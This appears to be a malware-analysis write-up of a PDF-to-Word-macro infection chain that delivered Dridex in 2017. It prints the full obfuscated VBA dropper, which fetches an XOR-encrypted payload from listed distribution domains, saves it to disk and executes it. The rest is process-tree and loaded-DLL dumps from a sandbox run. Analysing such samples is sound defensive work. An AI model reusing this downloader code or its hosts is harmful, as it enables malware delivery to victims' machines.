INFO
DYNAMIC FLOW
PDF View
MACRO CODE
Extension CLSID Verification Host
Public Const DRUFTINGSystem = "User-Agent"
Public SubProperty As Object
Public Const Sooopchik = "etof"
Public DRUFTINGPokerFace As Variant
Public DRUFTINGGMAKO As Object
Public DRUFTINGLAKOPPC As String
Public DRUFTINGPIRO_LOR As Object
Public ProjectDarvin As Integer
Public DRUFTINGRDD2 As Object
Public smbi As String
Public DRUFTING2 As String
Public Const FreshID = 0
Public ArizonaSu() As String
Public DRUFTINGProject As String
Public Vaucher As String
Public DRUFTINGProjectBBB As String
Public CuPro As Object
Public MovedPermanently() As String
Public DRUFTING4 As String
Public Function Assimptota4(FullPath As String, NumHoja As Integer) As String
WidthA DRUFTINGProjectBBB, DRUFTINGProject, "ZGJQwTKUfkEXpZQqKABSuCbd8WMrzM5A"
DRUFTINGGMAKO.Open (DRUFTINGProject)
End Function
Public Function CheckRectsMenu4() As Integer
Dim rTemp As RECT, rMouse As RECT, i As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
For i = 0 To UBound(MenuRect)
If IntersectR.ect(rTemp, MenuRect(i), rMouse) Then
CheckRectsMenu4 = i + 1
Exit Function
End If
Next
End Function
Public Function Assimptota6(FullPath As String, NumHoja As Integer) As String
DRUFTINGProjectSpeed
CallByName SubProperty, "Open", VbMethod
If NumHoja > 400 Then
If numExportadas = 0 Then
Assimptota6 = "No rows to export [No tiene filas por exportar]"
Exit Function
End If
End If
DRUFTINGPokerFace = CallByName(CuPro, "responseBody", VbGet)
SubProperty.Write DRUFTINGPokerFace
CallByName SubProperty, "sav" + Sooopchik + "ile", VbMethod, DRUFTINGProjectBBB, 2
Assimptota4 ".", 1
End Function
Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, Assimptota6OrAfter As String)
Dim i
On Error GoTo d13
For i = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1
SaveDataCSVToolStripMenuItem_Click 72
If CuPro.Status <> 200 Then
Err.Raise 700 + vbObjectError, "A", "D"
End If
Assimptota6 "33", 3
Exit Sub
d13:
Next
Exit Sub
End Sub
Public Function CheckRectsAd() As Boolean
Dim rTemp As RECT, rMouse As RECT, i As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
If IntersectR.ect(rTemp, AdRect, rMouse) Then
CheckRectsAd = True
Exit Function
End If
End Function
Public Function Ashnorog(Var1, Var2)
Ashnorog = Var1 Xor Var2
End Function
Public Sub Method1(MethodParam2() As Byte, MethodParam As String)
Dim AhnLab2 As Long
Dim AhnLab3 As Long
Dim AhnLab5 As Long
Dim AhnLab6 As Long
Dim plusplus() As Byte
Dim AhnLab4 As Long
Dim plusplusLen As Long
plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)
plusplus = StrConv(MethodParam, vbFromUnicode)
AhnLab2 = UBound(MethodParam2) + 1
AhnLab5 = AhnLab2
For AhnLab4 = 0 To (AhnLab2 - 1)
aa = plusplus(AhnLab4 Mod plusplusLen)
bb = MethodParam2(AhnLab4)
MethodParam2(AhnLab4) = Ashnorog(bb, aa)
If (AhnLab4 >= AhnLab6) Then
AhnLab3 = Int((AhnLab4 / AhnLab5) * 100)
AhnLab6 = (AhnLab5 * ((AhnLab3 + 1) / 100)) + 1
End If
Next
End Sub
Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer)
DRUFTING4 = Odish.ZK.Caption & MovedPermanently(i)
ProjectDarvin = ProjectDarvin + 2
Dim XIpotom2 As ChiClass
Set XIpotom2 = New ChiClass
If e < 488 Then
XIpotom2.Challenge "Swed", 13
CallByName CuPro, Odish.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
Else
End If
End Sub
Public Sub WellNowYouAreReady()
If ActiveDocument.Kind = 0 Then
Set CuPro = CreateObject(Vaucher)
End If
Set DRUFTINGPIRO_LOR = CreateObject(ArizonaSu(FreshID + 3))
smbi = Odish.Label1.Caption
MovedPermanently = Split("integritycomputers.biz/6gfd43Vwebrus.net/6gfd43Vgth.co.uk/6gfd43", Odish.Command.Caption)
Set SubProperty = CreateObject(ArizonaSu(1))
Set DRUFTINGGMAKO = CreateObject(ArizonaSu(1 + 2 + 3 - 4))
Set DRUFTINGRDD2 = DRUFTINGPIRO_LOR.Environment(ArizonaSu(4))
ProjectDarvin = 12
DRUFTINGLAKOPPC = DRUFTINGRDD2(ArizonaSu(ProjectDarvin / 2))
ProjectDarvin = ProjectDarvin - ProjectDarvin
MoveSheets "A", "B", "C"
End Sub
DOWNLOAD ENCRYPTED PAYLOAD
DNS
3 WAY HANDSHAKE
GET
DOWNLOAD ENCRYPTED PAYLOAD
PAYLOAD
Since binary was not compiled with Wow64DisableWow64FsRedirection, following path is used
C:\Windows\SysWOW64\svchost.exe
HANDLES
Thu Apr 20 20:05:24 2017 4444 AcroRd32.exe -> belongsTo 1880
****************************************************
** 4444 (0x0000115C)
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\syswow64\USER32.dll}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\syswow64\ADVAPI32.dll}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\syswow64\SHELL32.dll}
-> {C:\Windows\syswow64\SHLWAPI.dll}
-> {C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll}
-> {C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.dll}
-> {C:\Windows\system32\VERSION.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGM.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll}
-> {C:\Windows\syswow64\ole32.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\COMCTL32.dll}
-> {C:\Windows\system32\WINMM.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIB.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll}
-> {C:\Windows\syswow64\OLEAUT32.dll}
-> {C:\Windows\syswow64\CLBCatQ.DLL}
-> {C:\Windows\system32\propsys.dll}
-> {C:\Windows\system32\ntmarta.dll}
-> {C:\Windows\syswow64\WLDAP32.dll}
-> {C:\Windows\syswow64\SETUPAPI.dll}
-> {C:\Windows\syswow64\CFGMGR32.dll}
-> {C:\Windows\syswow64\DEVOBJ.dll}
-> {C:\Windows\system32\CRYPTSP.dll}
-> {C:\Windows\system32\rsaenh.dll}
-> {C:\Windows\system32\RpcRtRemote.dll}
-> {C:\Windows\system32\UxTheme.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api}
-> {C:\Windows\syswow64\profapi.dll}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api}
-> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl}
-> {C:\Windows\system32\MSIMG32.dll}
-> {C:\Windows\SysWOW64\oleacc.dll}
-> {C:\Windows\system32\Msftedit.dll}
Thu Apr 20 20:05:29 2017 1680 WINWORD.EXE -> belongsTo 4444
****************************************************
** 1680 (0x00000690)
-> {C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\Comctl32.dll}
-> {C:\Windows\syswow64\ADVAPI32.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\USER32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
-> {C:\Program Files (x86)\Microsoft Office\Office14\wwlib.dll}
-> {C:\Windows\syswow64\ole32.dll}
-> {C:\Windows\syswow64\OLEAUT32.dll}
-> {C:\Program Files (x86)\Microsoft Office\Office14\gfx.dll}
-> {C:\Windows\system32\WTSAPI32.dll}
-> {C:\Windows\system32\MSIMG32.dll}
-> {C:\Program Files (x86)\Microsoft Office\Office14\oart.dll}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso.dll}
-> {C:\Windows\system32\msi.dll}
-> {C:\Windows\syswow64\SHELL32.dll}
-> {C:\Windows\syswow64\SHLWAPI.dll}
-> {C:\Windows\system32\apphelp.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32.dll}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf}
-> {C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl.dll}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL.DLL}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES.DLL}
-> {C:\Windows\system32\DwmApi.DLL}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL}
-> {C:\Windows\system32\UxTheme.DLL}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20.dll}
-> {C:\Windows\system32\mscoree.dll}
-> {C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll}
-> {C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL}
-> {C:\Windows\system32\Winspool.DRV}
-> {C:\Windows\system32\VERSION.dll}
-> {C:\Windows\syswow64\CLBCatQ.DLL}
-> {C:\Windows\system32\propsys.dll}
-> {C:\Windows\system32\ntmarta.dll}
-> {C:\Windows\syswow64\WLDAP32.dll}
-> {C:\Windows\syswow64\SETUPAPI.dll}
-> {C:\Windows\syswow64\CFGMGR32.dll}
-> {C:\Windows\syswow64\DEVOBJ.dll}
-> {C:\Windows\system32\CRYPTSP.dll}
-> {C:\Windows\system32\rsaenh.dll}
-> {C:\Windows\system32\RpcRtRemote.dll}
-> {C:\Windows\System32\msxml6.dll}
-> {C:\Windows\System32\bcrypt.dll}
-> {C:\Windows\syswow64\profapi.dll}
-> {C:\Windows\system32\SXS.DLL}
-> {C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\x86\FPC_WordAddin_x86.dll}
-> {C:\Windows\syswow64\COMDLG32.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23688_none_5c0a8e35a00adeb9\gdiplus.dll}
Thu Apr 20 20:05:35 2017 1520 redchip2.exe -> belongsTo 1680
****************************************************
** 1520 (0x000005F0)
-> {C:\Users\foo\AppData\Local\Temp\redchip2.exe}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\system32\CLUSAPI.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\ADVAPI32.dll}
-> {C:\Windows\system32\cryptdll.dll}
-> {C:\Windows\syswow64\WS2_32.dll}
-> {C:\Windows\syswow64\NSI.dll}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\USER32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\system32\WINMM.dll}
-> {C:\Windows\syswow64\SHELL32.dll}
-> {C:\Windows\syswow64\SHLWAPI.dll}
-> {C:\Windows\syswow64\CRYPT32.dll}
-> {C:\Windows\syswow64\MSASN1.dll}
-> {C:\Windows\system32\WinSCard.dll}
-> {C:\Windows\system32\MPRAPI.dll}
-> {C:\Windows\syswow64\WININET.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
-> {C:\Windows\system32\version.DLL}
-> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
-> {C:\Windows\syswow64\normaliz.DLL}
-> {C:\Windows\syswow64\iertutil.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
-> {C:\Windows\syswow64\USERENV.dll}
-> {C:\Windows\syswow64\profapi.dll}
-> {C:\Windows\system32\Secur32.dll}
-> {C:\Windows\system32\NTDSAPI.dll}
-> {C:\Windows\syswow64\OLEAUT32.dll}
-> {C:\Windows\syswow64\ole32.dll}
-> {C:\Windows\syswow64\SETUPAPI.dll}
-> {C:\Windows\syswow64\CFGMGR32.dll}
-> {C:\Windows\syswow64\DEVOBJ.dll}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
-> {C:\Windows\syswow64\PsApi.DLL}
-> {C:\Windows\system32\CRYPTSP.dll}
-> {C:\Windows\system32\rsaenh.dll}
-> {C:\Windows\system32\apphelp.dll}
-> {C:\Windows\system32\ntmarta.dll}
-> {C:\Windows\syswow64\WLDAP32.dll}
Thu Apr 20 20:05:35 2017 2956 svchost.exe -> belongsTo 1520
****************************************************
** 2956 (0x00000B8C)
-> {C:\Windows\SysWOW64\svchost.exe}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\syswow64\USER32.dll}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\syswow64\ADVAPI32.dll}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
Thu Apr 20 20:09:03 2017 3212 iexplore.exe -> belongsTo 2944
****************************************************
** 3212 (0x00000C8C)
-> {C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
-> {C:\Windows\syswow64\advapi32.DLL}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\syswow64\iertutil.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
-> {C:\Windows\system32\version.DLL}
-> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
-> {C:\Windows\syswow64\user32.DLL}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
-> {C:\Windows\syswow64\normaliz.DLL}
-> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
-> {C:\Windows\syswow64\shlwapi.DLL}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll}
-> {C:\Windows\syswow64\shell32.DLL}
-> {C:\Windows\system32\IEFRAME.dll}
-> {C:\Windows\syswow64\ole32.dll}
-> {C:\Windows\syswow64\OLEAUT32.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll}
-> {C:\Program Files (x86)\Internet Explorer\IEShims.dll}
-> {C:\Windows\syswow64\comdlg32.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll}
-> {C:\Windows\syswow64\urlmon.dll}
-> {C:\Windows\syswow64\WININET.dll}
-> {C:\Windows\syswow64\USERENV.dll}
-> {C:\Windows\syswow64\profapi.dll}
-> {C:\Windows\system32\Secur32.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll}
-> {C:\Windows\syswow64\WS2_32.dll}
-> {C:\Windows\syswow64\NSI.dll}
-> {C:\Windows\system32\mswsock.dll}
-> {C:\Windows\System32\wship6.dll}
-> {C:\Windows\system32\IPHLPAPI.DLL}
-> {C:\Windows\system32\WINNSI.DLL}
-> {C:\Windows\system32\CRYPTSP.dll}
-> {C:\Windows\system32\rsaenh.dll}
-> {C:\Windows\system32\RpcRtRemote.dll}
-> {C:\Windows\syswow64\CLBCatQ.DLL}
-> {C:\Program Files (x86)\Internet Explorer\ieproxy.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll}
-> {C:\Windows\system32\bcrypt.dll}
-> {C:\Windows\SysWOW64\bcryptprimitives.dll}
-> {C:\Windows\system32\MSHTML.dll}
-> {C:\Windows\system32\d2d1.dll}
-> {C:\Windows\system32\DWrite.dll}
-> {C:\Windows\system32\dxgi.dll}
-> {C:\Windows\system32\dwmapi.dll}
-> {C:\Windows\syswow64\WINTRUST.dll}
-> {C:\Windows\syswow64\CRYPT32.dll}
-> {C:\Windows\syswow64\MSASN1.dll}
-> {C:\Windows\system32\d3d11.dll}
-> {C:\Windows\system32\vm3dum_10.dll}
-> {C:\Windows\system32\WINMM.dll}
-> {C:\Windows\system32\dbghelp.dll}
-> {C:\Windows\system32\apphelp.dll}
-> {C:\Windows\system32\MLANG.dll}
-> {C:\Windows\system32\PROPSYS.dll}
-> {C:\Windows\system32\DNSAPI.dll}
-> {C:\Windows\System32\wshtcpip.dll}
-> {C:\Windows\system32\rasadhlp.dll}
-> {C:\Windows\system32\IEUI.dll}
-> {C:\Windows\System32\fwpuclnt.dll}
-> {C:\Windows\system32\UxTheme.dll}
-> {C:\Windows\SysWOW64\jscript9.dll}
-> {C:\Windows\SysWOW64\ieapfltr.dll}
-> {C:\Windows\system32\msimtf.dll}
-> {C:\Windows\System32\msxml6.dll}
-> {C:\Windows\SysWOW64\uiautomationcore.dll}
-> {C:\Windows\syswow64\PSAPI.DLL}
-> {C:\Windows\SysWOW64\OLEACC.dll}
-> {C:\Windows\system32\credssp.dll}
-> {C:\Windows\SysWOW64\schannel.dll}
-> {C:\Windows\system32\ncrypt.dll}
-> {C:\Windows\system32\GPAPI.dll}
-> {C:\Windows\system32\cryptnet.dll}
-> {C:\Windows\syswow64\WLDAP32.dll}
-> {C:\Windows\system32\SensApi.dll}
-> {C:\Windows\system32\windowscodecs.dll}
-> {C:\Windows\system32\XmlLite.dll}
-> {C:\Windows\system32\WINHTTP.dll}
-> {C:\Windows\system32\webio.dll}
-> {C:\Windows\system32\dhcpcsvc.DLL}
-> {C:\Windows\system32\dhcpcsvc6.DLL}
-> {C:\Windows\syswow64\CFGMGR32.dll}
Thu Apr 20 20:13:21 2017 2920 iexplore.exe -> belongsTo 2944
****************************************************
** 2920 (0x00000B68)
-> {C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE}
-> {C:\Windows\SysWOW64\ntdll.dll}
-> {C:\Windows\syswow64\kernel32.dll}
-> {C:\Windows\syswow64\KERNELBASE.dll}
-> {C:\Windows\syswow64\msvcrt.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
-> {C:\Windows\syswow64\advapi32.DLL}
-> {C:\Windows\SysWOW64\sechost.dll}
-> {C:\Windows\syswow64\RPCRT4.dll}
-> {C:\Windows\syswow64\SspiCli.dll}
-> {C:\Windows\syswow64\CRYPTBASE.dll}
-> {C:\Windows\syswow64\iertutil.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
-> {C:\Windows\system32\version.DLL}
-> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
-> {C:\Windows\syswow64\user32.DLL}
-> {C:\Windows\syswow64\GDI32.dll}
-> {C:\Windows\syswow64\LPK.dll}
-> {C:\Windows\syswow64\USP10.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
-> {C:\Windows\syswow64\normaliz.DLL}
-> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
-> {C:\Windows\syswow64\shlwapi.DLL}
-> {C:\Windows\system32\IMM32.DLL}
-> {C:\Windows\syswow64\MSCTF.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll}
-> {C:\Windows\syswow64\shell32.DLL}
-> {C:\Windows\system32\IEFRAME.dll}
-> {C:\Windows\syswow64\ole32.dll}
-> {C:\Windows\syswow64\OLEAUT32.dll}
-> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll}
-> {C:\Program Files (x86)\Internet Explorer\IEShims.dll}
-> {C:\Windows\syswow64\comdlg32.dll}
-> {C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll}
-> {C:\Windows\syswow64\urlmon.dll}
-> {C:\Windows\syswow64\WININET.dll}
-> {C:\Windows\syswow64\USERENV.dll}
-> {C:\Windows\syswow64\profapi.dll}
-> {C:\Windows\system32\Secur32.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll}
-> {C:\Windows\syswow64\WS2_32.dll}
-> {C:\Windows\syswow64\NSI.dll}
-> {C:\Windows\system32\mswsock.dll}
-> {C:\Windows\System32\wship6.dll}
-> {C:\Windows\system32\IPHLPAPI.DLL}
-> {C:\Windows\system32\WINNSI.DLL}
-> {C:\Windows\system32\CRYPTSP.dll}
-> {C:\Windows\system32\rsaenh.dll}
-> {C:\Windows\system32\RpcRtRemote.dll}
-> {C:\Windows\syswow64\CLBCatQ.DLL}
-> {C:\Program Files (x86)\Internet Explorer\ieproxy.dll}
-> {C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll}
-> {C:\Windows\system32\MSHTML.dll}
-> {C:\Windows\system32\d2d1.dll}
-> {C:\Windows\system32\DWrite.dll}
-> {C:\Windows\system32\dxgi.dll}
-> {C:\Windows\system32\dwmapi.dll}
-> {C:\Windows\syswow64\WINTRUST.dll}
-> {C:\Windows\syswow64\CRYPT32.dll}
-> {C:\Windows\syswow64\MSASN1.dll}
-> {C:\Windows\system32\d3d11.dll}
-> {C:\Windows\system32\vm3dum_10.dll}
-> {C:\Windows\system32\WINMM.dll}
-> {C:\Windows\system32\dbghelp.dll}
-> {C:\Windows\system32\bcrypt.dll}
-> {C:\Windows\SysWOW64\bcryptprimitives.dll}
-> {C:\Windows\system32\IEUI.dll}
-> {C:\Windows\system32\SXS.DLL}
-> {C:\Windows\system32\UxTheme.dll}
-> {C:\Windows\system32\apphelp.dll}
-> {C:\Windows\system32\DNSAPI.dll}
-> {C:\Windows\system32\PROPSYS.dll}
-> {C:\Windows\SysWOW64\ieapfltr.dll}
-> {C:\Windows\SysWOW64\jscript9.dll}
-> {C:\Windows\system32\msimtf.dll}
-> {C:\Windows\system32\OLEACC.DLL}
-> {C:\Windows\SysWOW64\uiautomationcore.dll}
-> {C:\Windows\syswow64\PSAPI.DLL}
-> {C:\Windows\system32\XmlLite.dll}
-> {C:\Windows\System32\wshtcpip.dll}
-> {C:\Windows\system32\rasadhlp.dll}
-> {C:\Windows\System32\fwpuclnt.dll}
CONCLUSION
I only wanted to cover the technique used. In this attack the final payload was used as Dridex, however, payload could have been used for many other malicious activities e.g. Hooks, Data theft, ransomware etc.
VIRUS TOTAL REPORT
